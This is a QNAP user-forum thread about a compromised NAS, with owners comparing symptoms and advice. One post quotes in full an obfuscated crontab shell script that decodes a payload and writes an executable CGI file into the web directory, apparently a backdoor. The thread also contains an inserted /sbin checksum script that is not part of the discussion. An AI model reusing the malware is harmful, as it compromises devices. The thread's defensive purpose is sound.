Strange folders and cronjobs

Questions about SNMP, Power, System, Logs, disk, & RAID.
dolbyman
Guru
Posts: 19697
Joined: Sat Feb 12, 2011 2:11 am
Location: Vancouver BC , Canada

Re: Strange folders and cronjobs

Post by dolbyman » Tue Sep 11, 2018 3:47 am

Not sure why you are investigating on your live NAS. Kill it with fire (including the autorun.sh), then restore the NAS and data from scratch. The system could be very deeply compromised.

Don
Guru
Posts: 12004
Joined: Thu Jan 03, 2008 4:56 am
Location: Long Island, New York

Re: Strange folders and cronjobs

Post by Don » Tue Sep 11, 2018 3:59 am

I believe bcclient is a QNAP process. Something to do with Qfinder.
Read the Online Manuals and use the forum search feature before posting.

It is recommended to use RAID and have external backups. RAID will protect you from disk failure, keep your system running, and data accessible while the disk is replaced and the RAID rebuilt. Backups will allow you to recover data that is lost or corrupted, or from system failure. One does not replace the other.

Submit bugs and feature requests to QNAP via their Helpdesk app.

NAS: TVS-882BR | F/W: 4.3.6.0895 | 40GB | 2 x M.2 SATA RAID 1 (System/VMs) | 4 x M.2 NMVe QM2-4P-384A RAID 5 (Cache) | 5 x 4TB HDD RAID 6 (Data) | 1 x Blu-ray
NAS: TVS-663 | F/W: 4.4.2.1320 | 16GB | 2 x M.2 NMVe QM2-2P RAID 1 (Cache) | 4 x 4TB RAID 5
Apps: Boinc, Squid, DNSMasq, PLEX, iDrive, QVPN, QLMS, MP3fs, HBS, Entware, DLstation, +others

robert_m_muench
Getting the hang of things
Posts: 88
Joined: Mon Feb 12, 2018 9:26 pm

Re: Strange folders and cronjobs

Post by robert_m_muench » Tue Sep 11, 2018 4:01 am

Ok, bcclient comes back when being killed... and the outgoing internet traffic is rising. It's installed in /sbin/... I queried the process information for it via: ls -l /proc/<id>/exe, cwd and fd. I moved the file to my home directory and killed all running instances of it: killall bcclient

What makes hunting all this down hard is that the basic shell commands are implemented via BusyBox, which is very limited. So no "ps auxf" etc.

I have a bunch of files in /sbin with date 2018-08-30 05:23; the interesting thing is that almost all other files are links. I have the latest firmware version installed. How about calculating a checksum of all /sbin programs and comparing with others to see what kind of versions we all have? /sbin should be pretty much the same for everyone.
TVS-1282T3
CPU: Intel Core i7-7700 CPU @ 3.60GHz
Memory: 64 GB
2 x Samsung SSD 850 EVO M.2 1TB (M.2 SATA)
2 x Samsung SSD 860 EVO 2TB (SATA)
4 x WDC WD6002FFWX-68TZ4N0 (SATA) (6TB)
4 x Seagate ST12000VN0007-2GS116 (SATA) (12TB)
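The checksum-and-compare idea from the post above, written out as an added example (this is not code from the thread or from QNAP). It builds a sortable inventory of a binaries directory such as /sbin, recording symlinks with their targets and regular files with a SHA-256, so two owners can diff their lists, and it separately lists regular (non-link) files modified after a reference file, which is the "files dated 2018-08-30 while everything else is a link" observation turned into a check. The directory path is a parameter; the sample directory in the usage is constructed. POSIX sh only, so it runs under BusyBox as well as bash.

```shell
#!/bin/sh
# Added example, not from the thread: inventory a binaries directory so that
# checksums can be compared between systems and odd regular files stand out.

# inventory_bin_dir DIR
# One line per entry, tab separated and sorted so two inventories diff cleanly:
#   link <name> <symlink target>
#   file <name> <sha256 of contents>
inventory_bin_dir() {
    dir=$1
    for f in "$dir"/*; do
        # an empty directory leaves the glob unexpanded; skip that literal
        [ -e "$f" ] || [ -L "$f" ] || continue
        name=${f##*/}
        if [ -L "$f" ]; then
            printf 'link\t%s\t%s\n' "$name" "$(readlink "$f")"
        elif [ -f "$f" ]; then
            sum=$(sha256sum "$f" | cut -d' ' -f1)
            printf 'file\t%s\t%s\n' "$name" "$sum"
        fi
    done | sort
}

# count_regular_files DIR -> how many entries are real files rather than links
count_regular_files() {
    inventory_bin_dir "$1" | grep -c '^file' || true
}

# regular_files_newer_than DIR REF -> names of non-link files with an mtime
# later than the reference file REF (e.g. a file from the firmware install)
regular_files_newer_than() {
    find "$1" -maxdepth 1 -type f -newer "$2" | sed 's#.*/##' | sort
}

# diff_inventories OLD NEW -> only the changed or added lines between two
# saved inventories ("<" from OLD, ">" from NEW); empty output means identical
diff_inventories() {
    diff "$1" "$2" | grep '^[<>]' || true
}

# Usage: sh inventory.sh /sbin > sbin-$(hostname).txt, then exchange the files
# and run diff_inventories on them. With no argument nothing is printed.
if [ $# -gt 0 ]; then
    inventory_bin_dir "$1"
fi
```

Saving the inventory right after a clean firmware install gives a baseline; the next run plus diff_inventories then shows which entries stopped being links or changed content, which is far easier to read than eyeballing `ls -l` output over a BusyBox shell.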

robert_m_muench
Getting the hang of things
Posts: 88
Joined: Mon Feb 12, 2018 9:26 pm

Re: Strange folders and cronjobs

Post by robert_m_muench » Tue Sep 11, 2018 4:05 am

Ok, bcclient is the process used for Qfinder device discovery and configuration. How dumb is QNAP to use a program name that already exists as something else? How about prefixing all QNAP processes?

Mousetick
Easy as a breeze
Posts: 352
Joined: Thu Aug 24, 2017 10:28 pm

Re: Strange folders and cronjobs

Post by Mousetick » Tue Sep 11, 2018 5:35 am

Yeah, as dolbyman said, at this point you're better off reinitializing the NAS from scratch, reinstalling and reconfiguring all your applications, and restoring your data.

Unless QNAP support has specifically asked you to keep your NAS in its current state so they can investigate?

If QNAP is serious about security, they should have honeypots set up in-house to detect potential attack vectors and perform forensics.

somy1982
Easy as a breeze
Posts: 356
Joined: Fri Apr 08, 2016 6:42 pm

Re: Strange folders and cronjobs

Post by somy1982 » Tue Sep 11, 2018 2:30 pm

dolbyman wrote: Not sure why you are investigating on your live NAS. Kill it with fire (including the autorun.sh), then restore the NAS and data from scratch. The system could be very deeply compromised.

It will take days of work to back up, reconfigure and restore the system, not to mention that snapshots of historic versions are gone. Don't know why QTS doesn't provide a way to only reset the OS in the system volume; at least data could be kept that way.

robert_m_muench
Getting the hang of things
Posts: 88
Joined: Mon Feb 12, 2018 9:26 pm

Re: Strange folders and cronjobs

Post by robert_m_muench » Tue Sep 11, 2018 2:51 pm

somy1982 wrote: It will take days of work to back up, reconfigure and restore the system, not to mention that snapshots of historic versions are gone. Don't know why QTS doesn't provide a way to only reset the OS in the system volume; at least data could be kept that way.


Exactly!! This is a major usage-pattern flaw. What I have done is transfer the volumes of the storage pool where the system is located to a new storage pool [1][2]. By this action, the old volume is empty and a "Snapshot Shared Folder Thick Volume" is created (whatever this special type is; see screenshot). My idea is to detach pool 2, remove the disks and then wipe the NAS, reinstall and get pool 2 back online. IMO this should work.

Besides being open to such a vulnerability, the current B2 cloud backup is broken in that it's totally slow...

What I don't get is why they don't include things like digital signatures of all files, and store dynamic files in a special area that can be wiped without having to re-install the system. Log all changes to system files, and audit these automatically. Of course, this won't give 100% protection, but I think the more parts are involved in keeping, tracking and handling security, the harder it gets for an attacker to get in, because all of these parts have to be fooled to stay unrecognized.

[1] viewtopic.php?f=25&t=143229
[2] viewtopic.php?f=73&t=143153

somy1982
Easy as a breeze
Posts: 356
Joined: Fri Apr 08, 2016 6:42 pm

Re: Strange folders and cronjobs

Post by somy1982 » Tue Sep 11, 2018 3:15 pm

robert_m_muench wrote:
somy1982 wrote: It will take days of work to back up, reconfigure and restore the system, not to mention that snapshots of historic versions are gone. Don't know why QTS doesn't provide a way to only reset the OS in the system volume; at least data could be kept that way.


Exactly!! This is a major usage-pattern flaw. What I have done is transfer the volumes of the storage pool where the system is located to a new storage pool [1][2]. By this action, the old volume is empty and a "Snapshot Shared Folder Thick Volume" is created (whatever this special type is; see screenshot). My idea is to detach pool 2, remove the disks and then wipe the NAS, reinstall and get pool 2 back online. IMO this should work.

Besides being open to such a vulnerability, the current B2 cloud backup is broken in that it's totally slow...

What I don't get is why they don't include things like digital signatures of all files, and store dynamic files in a special area that can be wiped without having to re-install the system. Log all changes to system files, and audit these automatically. Of course, this won't give 100% protection, but I think the more parts are involved in keeping, tracking and handling security, the harder it gets for an attacker to get in, because all of these parts have to be fooled to stay unrecognized.

[1] viewtopic.php?f=25&t=143229
[2] viewtopic.php?f=73&t=143153

Just wait a few days more - QNAP said they are testing the new Malware Remover, which can fix the problem. For now, disconnect the device from the internet and back up the data you need protected. In my case I just keep all important data locked in an encrypted volume until I'm sure the system is clean.

GuyLerome
New here
Posts: 3
Joined: Thu Apr 20, 2017 1:01 am

Re: Strange folders and cronjobs

Post by GuyLerome » Wed Sep 12, 2018 11:52 pm

I got hit by this as well, on the same date. Needless to say I'm not impressed with QNAP at all.

But I suffered from another hack back in May, possibly same vector (cgi-bin injection).

I have some files if anyone is interested, I'd be interested to have the following unscrambled (it was running as a crontab task):

Code:

#!/bin/sh

un${rJfGoCeT}set
t${sRPxpooQrr}e$BzDXeBX$''s${lSoIuZFyttyO}t
unset${YmEJeEYnMemYTRr}
ty${dyXrQEWAaBxT}pe${eoepEN}${nDveEQiguCuf}
u${BJJQOLerBYUW}n${tujHf}set
${eAkLNO}eva$'\x6c'${WLpRRFgHzRIJm}
${kVxAZHuvuNtU}true
unse${OjClONM}t
t${nFMsupFntg}ype${vfGrnTqt}${gdUoUwgrtP}
fa${Etpxn}lse
${KHaSQAesZxNWOmB}eva${yJkrA}l
${HYvwkP}$'\x65'val${DRcjemKjJ}${eHuiqBaN}
t${vlVXnsdAgcls}es${VddqpQ}t
comm${pOLlUfIMtXaIx}and
t${rKeCCsEjZGF}rue
builti${ySIxVP}n${yvDbsttypKAhaCp}
type${tAXlpOSfZOUMpBk}
b${zPvQNTPwcDOmvEu}ui${PPfdsClfQbDdCJG}lti${DJeGkGVGpJNUVc}n
com${nYGPa}man${mPkRGrEBpQ}d$jFZNzrf$''
te${PsWIKfvY}s${FhAavkSnkChou}t${NDCPVoxagcsVLsF}
${urQSzVPz}type
IHAsSeFD=tr${RtGrEm}$kXCxr$''
dRvQOqHp=${rvvkQiAbsohzscT}${ZqJgaRJO}$'\x5c'${vNczyLQHUuJKwyH}${lWvIgmSM}
xDpbVpMF=${ecJHnCtU}${QSYmherRr}${giUBkHlipNegO}${dRvQOqHp}13$'\x33'${kMBkzNgxbBBnO}${GTlvfeb}${lEDplsrremnCgc}
ZzjZIchA=${BgmSdEMP}${cNlOacXXD}${eGBSzKQJPMcCJ}${dRvQOqHp}05$'\x35'${WusVoQTPuJTfV}${zvdFSKu}${AlskuudQXDsUaL}
TDOxVgwZ=${KltJBYnE}${RXZSkbGfH}${CqDwtyCcqWWLM}${dRvQOqHp}13$'\x34'${jeccPnCiGLKmB}${sECmnSD}${FaoXztFNzGWINn}
$IHAsSeFD '=A!;c]t(VB#KF<mI&S$}DuJqslQeTy|LwbHna'"'"''$TDOxVgwZ'xX*vjfEC)oZgU\n>%PkO`W+M"iNY{z'$ZzjZIchA'Gprhd R'$xDpbVpMF'' 'MC'$TDOxVgwZ'|!(OihxQAua"\np`zD)r}TnbHSy>cmU k{v;]+eN=L%XKtRVwPo'"'"'FEY&dGf*'$xDpbVpMF'JWB#gs$jIl'$ZzjZIchA'q<Z'<<"dYBnoRCi"|b${iZNJzaXkT}as$'\x68'${tQUZaBeNXslyx}
jT*K+NYh $-v/V
GnrY#*TzVL(#TK-iEJG>!B6`>X/V))&`GneU=$
 J/|z(Gn(Ah[JdGn-[*kzLQ=#wsPFqJlGs#ow<(soG>>(s/-Gn%+VX H#%s[sJT-Gnp**#`Jh
z.|zGnwi|(`qHk$-wXBH%J(IGnF&*- $J)G>!B72>GnkqkTPJGnF|aul-Bz#<Jb>Gq<!055cruWMlnYRL>m>m>Pbxvpw!134DAXFToK%'-aOh*ftzZ&]B\yJ[#sg$
E|k;=!smS!133)} e(VH`NQCijU+{>b>F%[!134pu<{hOnltXPbef\'# |!sR-jMQ=!133
aToZWkVv!055+qw$g*;y&UDKY>m>m>)i]sSzmGHrc(B}JEACN`xL>bRRbmrC)EV(#[sqz-$mbybGjT*K+NYh $-IW(/YVm/FzA"LmrF;rPI
PAnPAPPPPM-DuMPFZpAPPPPM-DuMP{VmZ}n1:&4NpAPPPPM-DuMP{uHZ}n2:&12NpAPPPPM-DuMP FguDLZ)}n3:&u&yE&<N)APPPP;rP&UDP)} FguDL)PXP/ULa/GrumU-{P#PnPAPPPPPPPPrLuUP&rmP}II}hE[`R%PxPIP}{uHP&P}{VmP+P1P
P+P}{VmP

PFpAPPPPPPPPLDz-P)}F)APPPPNANAD-{{umUP&aP{ ;L{gPsP/ULa/mGMMP2sl1P##P{ ;L{gPI
PnPAM-DuMPFG]]VHZS"LmrF;rP6P6SA;LF;P)}2)PllPnP{ UVrP)}n2xQQQQQQN}FG]]VH)pPLDz-P)}n2xQQQQQQN}FG]]VH)pPNP##PnP;-GDzP)}n1xQQQQQQN}FG]]VH)pPLDz-P)}n1xxQQQQQQN}FG]]VH)pPNANALHLDP2s/ULa/mGMMA$EBKZ)}n$EBKN:/YVm:/FYVm:/GFr/YVm:/GFr/FYVm:/GFr/YVm/Q11:/GFr/M-DuM/FYVm:/GFr/M-DuM/YVm)A;LF;P(P&yP)}nw\>ht_bBhe[fN)P##PnPgrVm;]P)`u;L:P)pPB<Zf%BPUu;LpPLHV;P0pPNALDz-P)`u;L:PbGmPEG"P10P09:00:14Pf%BP2014)ADrZSgrVm;]PkdrkP##PLDz-P&mLPkdrkSA;LF;P)}nWDrN)P&L!P1PllPLDz-P)}Dr)P##PLDz-P))A;LF;P)H}KBB$_h>q>h>h)PZP)H044U4u82178422277115D313u6u6149U7]402283)P##PLHV;P0A;LF;P(P&yP)}n0N)PllP;LF;PSgFPuGHP#P"rLgP)}n0N)P#PJDP&MSP&";P40PllPLHV;P0AD-{{umUP&aP-gLmFFMPs/ULa/mGMMP2sl1PllPnA$RbB`EBEZkkA Z)-u14\qROCb\ti8TM]|jVuhhj5F7Te9T0)A;LF;P)H}nh>w\>bB_%>BKR`N)PZPH$RbBPllP;LF;P(P&yP)}nw\>ht_bBhe[fN)PllPDuFLP)}nw\>ht_bBhe[fN)PVmPkkP#Po'(0&9voP#P0oP
P]uMFLPppP'0&9v'0&9v'0&9v'0&9v'0&9v'0&9v'0&9v'0&9vP
PUZ)}IIPSUu;LP+xFSP/P100P

)pP;LF;P)}nw\>ht_bBhe[fN)PZP)}nUN)PllPD;Z)}U)P##PnP;LF;P)}nw\>ht_bBhe[fN)PZP)}IIP}UP&P1

)PllPD;Z)}IIP}UP&P1P

)pPNPppPo
P]uMFLPppPLFuDPllP;LF;P(P&yP)}nw\>ht_bBhe[fN)PllPnAmMZkAkADuFLP)}nCR[B>[B_T>[fBKN)PVmPkkP#Po'(0&9voP#P0oP
P]uMFLPppPo
P;LF;P)}nCR[B>[B_T>[fBKN)P&M;P2147483646PppPLFuDPllPnPeqbZPrLuUP&UPkkP&rmP)}nCR[B>[B_T>[fBKN)P$RbB`EBEpP;LF;P&yP)}$RbB`EBE)PllP$RbB`EBEZSUUPYFZ1PD-Gm;Z)}CR[B>[B_T>[fBK)P2s/ULa/mGMMSpPNP##P;LF;P)}$RbB`EBE)P##P$RbB`EBEZSDu;SP##PLHV;P0AFZ)}n$RbB`EBEWWo.N)AF;Z)}nFWWo&N)AFZ)}nFxx&oN)AUZ)}IIP}UP/P1000P

)A;LF;P(P&yP)}U)PllP;LF;P(P&yP)}F;)PllP;LF;P)}nWF;N)PZP5PllPnP;LF;P)H}F;)PZP)H}U)P##P;LF;P)H}F;)PZP)H}IIP}UP&P1P

)pPNP##PnP;LF;P&]P)};)PllPr{P)};)pPLHV;P0pPNADuFLP)}F)PVmPkkP#Po'(u&yE&<0&9/+Z}mMvoP
P;LF;P&]P)};)PllPr{P)};)pPLHV;P0pPppPLFuDA;ZS{ ;L{gP/;{g/.;{g.QQQQQQSP##PLHV;P0ADu;PsP)};)PXX)>Rq)P##PnP;LF;P&]P)};)PllPr{P)};)pPLHV;P0pPNA&&&&&|>fe[P$\|TeCPi>t&&&&&A%ee|-cE[|" !z Vf9J0|Ew>qEERCEt8E%ee|V"iCEt>EOVf+K/1]DT%]B[\aa|LFAR=!06]Rf{|qie\RC$FOfgEGy`rCiMm|GK-T4zb>;mGHB|[;8cE|yU<+g9!\YE<3RAyu${=eUF1"KKM1iq+w8K5Y[U[F9%Ch >aC\"=fqL3EuMT7 +c/hQ|FjrFTCiUfijAuK+U;C0[UTiU yzi8!|!yKHC+%\fyLL5//R"`iUDiLLMuC"y\=u0GV11|<3ecigwAM7K- *K{Oyhr=f$DGD4 MK9Yi4bLE`LzhOcOMVaKwD!bi1F[FJug={2!`cOw7zchAh2FuRyGYB\J1+2wiM+%O5b]O-/|8[-g[t6>ERT8tC$*KCug!2u]2<O;zu*22*g]tAy;yc>O5R q[z6]h"<[gYFG%G4m$u|/r"a={FjH93umFz4eLQV$ORGi*|u{\<OeaTAHr2>bC2rz"jz!"=GVTMKf+K%i63$-U|%qOi!9rTU4z99mQY9+VC{qw9]y=iF9bb%Ac7HuUfguYi2u[Bg[3y`EG>fe4<R;!HT!jc>K{0Y>+<5qE"%|EE>ZA&&&&&>[`P$\|TeCPi>t&&&&&A>RqA;LF;P(P&yP)}F)PllPzZS-gLmFFMPYuFL64P&UPXX>RqP#P-gLmFFMPrFuG;MP&gGYVmP&Vm LOP)};)P&aLrV]OA}FA>RqASP##PnP;LF;P&]P)};)PllPr{P)};)pPLHV;P0pPNA;LF;P&]P)};)PllPr{P)};)A{Z)}n$RbB`EBExx.oN)A$RbB`EBEZkkADuFLP)}{)PVmPkkP#Po'(u&yE&<0&9/+Z}mMvoP
PLHV;P0PppPLFuDA ZS-gLmFFMPU"F;P&Fzu1P&YVmurOP&z{uDP)}D;)PXX>RqP#P-gLmFFMPYuFL64A} A>RqASA{ZS-gLmFFMPLmDP&UP&uLF&256&DYDP& P)} )P&{UPFzu1P&FuM;P&uPXX>RqA}{A>RqASA{zZS-gLmFFMPU"F;P&Fzu1P&YVmurOP&z{uDP)}F;)PXX>RqP#P-gLmFFMPYuFL64A}{A>RqASA;LF;P(P&yP)}z)PllP;LF;P)}z)PZP)}{z)P##PLHV;P0ALauMP)}{)A;rGLANP##PnA;ZS{ ;L{gP/;{g/.;{g.QQQQQQSP##PLHV;P0ADu;PsP)};)PXX)>Rq)P##PnP;LF;P&]P)};)PllPr{P)};)pPLHV;P0pPNA&&&&&|>fe[P$\|TeCPi>t&&&&&A%ee|-cE[|" !z Vf9J0|Ew>qEERCEt8E%ee|V"iCEt>E9w{K%J4cJ8CRTti"R!]CA0f<FhbJq"VHB0MV%D42<brFFrFqf<M`$i35yMU{Y\F>wQ;qt `c*L\D g2uz8qD]AE|q\f8%TmM6JBaHf<J==Y%T$`Vt-5M/U07|iDYJtG![g+2//2UG HCOu Reeme!qAT"r%5mag5|i||DD%M%|uFq;H<]q";[cMw9V9{[]V53muMr%$h-M9iV]j1tH{TJ1+A7fBGcqbMOi9EgaV/<e2O/aO{6[jYj>Fu>5|9""Q=tr*HMYiH%eyjGQ]18b2g48qzAg*\Ot=0{c`\D3bV=h4hV$V $gBw" bcO90u%ir-jCEU9%6D<;]JCyz%YaO;[{U;UAtH|[[m0q{w51DT$D+UgueeH2V/2DfUKt8<Ec|`%|%| ceL2"q"D6M=0jRMB638y+AJ7/{$+zDC-T*\VfbV>G{y3\T5${-*u3J2;04hu70$TjEgfFe/"gKOK0j8V6O*|K>A!\FuwHm|RqaO+Vb-{OqVM2UHiwTcBJO<|m8+1i{-m=2gE"%|EE>ZA&&&&&>[`P$\|TeCPi>t&&&&&A>RqA-gLmFFMPrFuG;MP&gGYVmP&Vm LOP)};)P&LmDrOg;PXX>RqP#P-gLmFFMPYuFL64A} A>RqAr{P)};)A;rGLPANpP;rGLpPNP##PnA;LF;P)H}ECC>$B_TE[f\Ef>)PZP)H1u10UU]5U672u2997U1U711L01DL2u6Y]uYYu50u)PllPLauMP)}nKBB$_\b>h_Ef>[BN)ANA;LF;P&]P)};)PllPr{P)};)AFMLLgP1ALHV;P0AIrC)EV(#[sqz-$I|VLG>!B6+>`Gns%gBWhPPV-|zJGn%p|rZ-JbG>!B37>55GnguFeiQW%ZPgBJGnU )p<#JbmGjT*K+NYh $-mIXB()b0II{
dYBnoRCi
lDOJRqCh=/${ffLmYRa}ho${pBZwtw}me/${RIHoqyCEJ}htt${nefxbyFZmzts}pd/c${NLWMMMtBWJwi}gi-bin/iscsitarge${QEAedAaBoaiTaNU}t${VbDZCOfl}sett${mdqOVw}ing.cgi
${WOGIwo}t${ZmZzaoDK}${ZvVdRkwSTEVQYGy}r 'ROk`P\nENhiuMQ=!U"\055v$C]DW(Jopxe'"'"'B*bTAlZL+aq&IHz KdmY}\133%>#V)y\134G|j{X;gfrF<wnsSct' 'qb'"'"'OB*j#Kid|T% \055L(FDxA]{sPM!y+;)`ae\ncmpRJ"t>\133IzXnkH=rVh<EwG$ZQoN\134gUC}YSf&Wulv'<<"suwVACZYaJDrk">$lDOJRqCh
Np/Oid/(>A;Td[(&[!-B!AW!A!!!!cjlbc!(}'A!!!!cjlbc!Zid}\W1:U4r'A!!!!cjlbc!ZbC}\W2:U12r'A!!!!cjlbc!m(LblT}q\W3:UbU ]UGrqA!!!!&[!Uul!q\m(LblTq!#!/uTt/S[bdujZ!M!W!A!!!!!!!![Tbu!U[d!\--\+]{$`o!=!-!\ZbC!U!\Zid!e!1!B!e!\Zid!BB!('A!!!!!!!!Tl>j!q\(qA!!!!rArAljZZbdu!Ut!Zm&TZL!I!/uTt/dScc!2In1!MM!Zm&TZL!-B!W!Acjlbc!(SwwiC}*;Td[(&[!6!6*A&T(&!q\2q!nn!W!Zmui[!q\W2=KKKKKKr\(SwwiCq'!Tl>j!q\W2=KKKKKKr\(SwwiCq'!r!MM!W!&jSl>!q\W1=KKKKKKr\(SwwiCq'!Tl>j!q\W1==KKKKKKr\(SwwiCq'!rArATCTl!2I/uTt/dSccAJ]QY}q\WJ]QYr:/Oid:/(Oid:/S([/Oid:/S([/(Oid:/S([/Oid/K11:/S([/cjlbc/(Oid:/S([/cjlbc/OidqA&T(&!p!U !q\W|gV+F_<Q+z{yrq!MM!W!L[id&w!q$b&T:!q'!QG}yoQ!ub&T'!TCi&!0'!rATl>j!q$b&T:!<Sd!]S;!10!09:00:14!yoQ!2014qAl[}*L[id&w!kX[k!MM!Tl>j!UdT!kX[k*A&T(&!q\WNl[rq!UTR!1!nn!Tl>j!q\l[q!MM!Tl>j!qqA&T(&!qC\YQQJ_+VvV+V+q!}!qC044u4b82178422277115l313b6b6149u7w402283q!MM!TCi&!0A&T(&!p!U !q\W0rq!nn!&T(&!*L(!bSC!M!;[TL!q\W0rq!M!)l!Uc*!U;&!40!nn!TCi&!0AljZZbdu!Ut!jLTd((c!I/uTt/dScc!2In1!nn!WAJ`<Q$]Q]}kkAm}qjb14gv`xf<gFh8"cwPsib++s5(7"z9"0qA&T(&!qC\W+V|gV<Q_oVQY`$rq!}!CJ`<Q!nn!&T(&!p!U !q\W|gV+F_<Q+z{yrq!nn!lb(T!q\W|gV+F_<Q+z{yrq!id!kk!M!
Hp0U9D
!M!0
!B!wbc(T!''!H0U9DH0U9DH0U9DH0U9DH0U9DH0U9DH0U9DH0U9D!B!u}q\--!*ub&T!e=(*!/!100!BBq'!&T(&!q\W|gV+F_<Q+z{yrq!}!q\Wurq!nn!l&}q\uq!MM!W!&T(&!q\W|gV+F_<Q+z{yrq!}!q\--!\u!U!1BBq!nn!l&}q\--!\u!U!1!BBq'!r!''!
B!wbc(T!''!T(bl!nn!&T(&!p!U !q\W|gV+F_<Q+z{yrq!nn!WAdc}kAkAlb(T!q\Wf`{QV{Q_"V{yQYrq!id!kk!M!
Hp0U9D
!M!0
!B!wbc(T!''!
B!&T(&!q\Wf`{QV{Q_"V{yQYrq!Uc&!2147483646!''!T(bl!nn!W!zv<}![Tbu!Uu!kk!U[d!q\Wf`{QV{Q_"V{yQYrq!J`<Q$]Q]'!&T(&!U !q\J`<Q$]Q]q!nn!J`<Q$]Q]}*uu!O(}1!ljSd&}q\f`{QV{Q_"V{yQYq!2I/uTt/dScc*'!r!MM!&T(&!q\J`<Q$]Q]q!MM!J`<Q$]Q]}*lb&*!MM!TCi&!0A(}q\WJ`<Q$]Q]NN
.rqA(&}q\W(NN
UrqA(}q\W(==U
rqAu}q\--!\u!/!1000!BBqA&T(&!p!U !q\uq!nn!&T(&!p!U !q\(&q!nn!&T(&!q\WN(&rq!}!5!nn!W!&T(&!qC\(&q!}!qC\uq!MM!&T(&!qC\(&q!}!qC\--!\u!U!1!BBq'!r!MM!W!&T(&!Uw!q\&q!nn![Z!q\&q'!TCi&!0'!rAlb(T!q\(q!id!kk!M!
HpbU ]UG0U9/e}\dcD
!B!&T(&!Uw!q\&q!nn![Z!q\&q'!TCi&!0'!''!T(blA&}*Zm&TZL!/&ZL/.&ZL.KKKKKK*!MM!TCi&!0Alb&!I!q\&q!##qV`vq!MM!W!&T(&!Uw!q\&q!nn![Z!q\&q'!TCi&!0'!rAUUUUUPVyz{!JgP"zf!hVFUUUUUAozzPjE]{P;mR>miy9)0P]|Vv]]`f]F8]ozzPi;hf]FV]xiyeY/1wl"owQ{gttPT(A`aR06w`yZPvhzg`fJ(xyL]S $[fhcdPSYj"4><V&dSCQP{&8E]P uGeL9RgO]G3`A bJZazu(1;YYc1hve|8Y5O{u{(9of+mVtfg;ayvT3]bc"7meE/+KP(s[("fhuyhsAbYeu&f0{u"hum >h8RPR YCfeogy TT5//`;$hulhTTcbf; gab0Si11PG3zEhL|Ac7Yjm%YZx +[ayJlSl4mcY9Oh4<T]$T>+xExcitY|lR<h1({()bLaZ2R$Ex|7>E+A+2(b` SOQg)1e2|hceox5<wxj/P8{jL{F6V]`"8FfJ%YfbLR2bw2Gx&>b%22%LwFA & EVx5`mv{>6w+;G{LO(SoS4dJbP/[;taZ(sC93bd(>4zTKiJx`Sh%PbZgGxzt"AC[2V<f2[>;s>R;aSi"cYyeYoh63JjuPovxhR9["u4>99dKO9eifZv|9w ah(9<<oAE7CbuyLbOh2b{QL{3 $]SVyz4G`&RC"RsEVYZ0OVeG5v];oP]]V}AUUUUUV{$!JgP"zf!hVFUUUUUAV`vA&T(&!p!U !q\(q!nn!>}*jLTd((c!Ob(T64!Uu!##V`v!M!jLTd((c![(bS&c!ULSOid!UidmTx!q\&q!UtT[iwxA\(AV`vA*!MM!W!&T(&!Uw!q\&q!nn![Z!q\&q'!TCi&!0'!rA&T(&!Uw!q\&q!nn![Z!q\&qAZ}q\WJ`<Q$]Q]==.
rqAJ`<Q$]Q]}kkAlb(T!q\Zq!id!kk!M!
HpbU ]UG0U9/e}\dcD
!B!TCi&!0!''!T(blAm}*jLTd((c!u;(&!U(>b1!UOidb[x!U>Zbl!q\l&q!##V`v!M!jLTd((c!Ob(T64A\mAV`vA*AZ}*jLTd((c!Tdl!Uu!UbT(U256UlOl!Um!q\mq!UZu!(>b1!U(bc&!Ub!##V`vA\ZAV`vA*AZ>}*jLTd((c!u;(&!U(>b1!UOidb[x!U>Zbl!q\(&q!##V`v!M!jLTd((c!Ob(T64A\ZAV`vA*A&T(&!p!U !q\>q!nn!&T(&!q\>q!}!q\Z>q!MM!TCi&!0ATtbc!q\ZqA&[STAr!MM!WA&}*Zm&TZL!/&ZL/.&ZL.KKKKKK*!MM!TCi&!0Alb&!I!q\&q!##qV`vq!MM!W!&T(&!Uw!q\&q!nn![Z!q\&q'!TCi&!0'!rAUUUUUPVyz{!JgP"zf!hVFUUUUUAozzPjE]{P;mR>miy9)0P]|Vv]]`f]F8]ozzPi;hf]FV]9|ZYo)4E)8f`"Fh;`RwfA0yG(+<)v;iCQ0ciol42G<[(([(vyGc$Jh35 cuZOg(V|K&vFm$E%TglmL2b>8vlwA]Pvgy8o"dc6)QtCyG)aaOo"J$iFj5c/u07PhlO)FSR{Le2//2uSmCfxbm`zzdzRvA";[o5dtL5PhPPllocoPb(v&CGwv;&{Ec|9i9Z{wi53dbc[oJ+jc9hiws1FCZ")1eA7yQSEv<cxh9]Lti/Gz2x/txZ6{sOsV(bV5P9;;KaF[%CcOhCoz sSKw18<2L48v>AL%gxFa0ZE$gl3<ia+4+iJimJLQ|;m<Ex90boh[jsf]u9o6lG&w)f >oOtx&{Zu&uAFCP{{d0vZ|51l"JleuLbzzC2i/2lyuYF8G]EP$oPoPmEzT2;v;l6ca0s`cQ638 eA)7/ZJe>lfj"%giy<iVSZ 3g"5JZj%b3)2&04+b70J"s]Ly(z/;LYxY0s8i6x%PYVARg(b|CdP`vtxei<jZxvic2uCh|"EQ)xGPd8e1hZjda2L];oP]]V}AUUUUUV{$!JgP"zf!hVFUUUUUAV`vAjLTd((c![(bS&c!ULSOid!UidmTx!q\&q!UTdl[xL&!##V`v!M!jLTd((c!Ob(T64A\mAV`vA[Z!q\&qA&[ST!Ar'!&[ST'!r!MM!WA&T(&!qC\]ffVJQ_"]{yg]yVq!}!qC1b10uuw5u672b2997u1u711T01lT2b6OwbOOb50bq!nn!Ttbc!q\WYQQJ_g<V+_]yV{QrqArA&T(&!Uw!q\&q!nn![Z!q\&qA(cTTL!1ATCi&!0A
suwVACZYaJDrk
c${OMESlc}hm${XJMLcEKf}o${iSWpMujSlUQtsvL}d 75${LIEYrUT}5 "$lDOJRqCh"

Don
Guru
Posts: 12004
Joined: Thu Jan 03, 2008 4:56 am
Location: Long Island, New York

Re: Strange folders and cronjobs

Post by Don » Thu Sep 13, 2018 12:48 am

Everyone puts the blame on QNAP without accepting any blame themselves. By opening up ports on your router and directing them to your NAS you will be attacked. If I need to access my equipment at home when I am away I use a VPN. Guess what? I have not been compromised.

Some tips/advice.

  1. All systems (Windows, Linux, Apple, QNAP, Synology, etc) are vulnerable to attack if you open them up to the internet.
  2. Run Malware remover on your NAS and schedule runs.
  3. Run McAfee on your NAS for additional protection.
  4. Run virus software on your PCs.
  5. Use a VPN instead of opening incoming ports on the router.
  6. Make frequent backups for protection.

Trexx
Ask me anything
Posts: 5284
Joined: Sat Oct 01, 2011 7:50 am
Location: Minnesota

